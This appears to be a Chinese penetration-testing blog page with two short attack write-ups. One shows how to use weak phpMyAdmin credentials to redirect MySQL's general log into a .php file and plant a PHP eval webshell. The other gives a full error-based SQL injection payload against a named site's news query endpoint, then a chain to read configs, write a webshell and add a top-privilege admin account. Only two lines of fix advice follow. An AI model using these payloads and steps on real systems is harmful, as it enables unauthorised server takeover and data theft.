标签 渗透 下的文章

windows下phpmyadmin弱口令直接getshell

通过phpinfo.php 或其他途径获取网站绝对路径

更改phpMyAdmin中变量选项:

general log file D:\phpStudy\MySQL\data\Archerx.php    #拓展名改为php
general log   ON   #打开日志记录

执行SQL语句如:

select "<?php @eval($_POST['archerx']); ?>";

该一句话木马会写入日志文件,菜刀连接即可。

青春在线注入漏洞导致getshell

注:全程有大佬带飞

注入点:`/news_query/post.php`

Type: `error-based`

Payload: `where=title&keyword=1' AND (SELECT 9096 FROM(SELECT COUNT(*),CONCAT(0x7176707171,(SELECT (ELT(9096=9096,1))),0x7162766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--bNdq&catname=&catid=0&sdate=%E5%BC%80%E5%A7%8B%E6%97%B6%E9%97%B4&edate=%E6%88%AA%E6%AD%A2%E6%97%B6%E9%97%B4`

image

image

获取系统信息

image

登陆后台

image

phpmyadmin 查看数据库

image

Getshell

image

利用步骤:

  • 注入漏洞读取相应文件:
  • 读取apache配置文件获取网站路径
  • 数据库配置文件获取 数据库账号密码
  • 通过phpmyadmin 进入数据库
  • Phpmyadmin sql命令在upload/* 下写入webshell(权限为DBA)
  • 在数据库admin表中添加新用户 id=1 (最高权限管理员)
  • 登陆网站管理后台(admin/phpcms为添加的测试账号请删除)

修复建议:

  1. Waf添加新规则
  2. 细化DBA账户读写权限
preView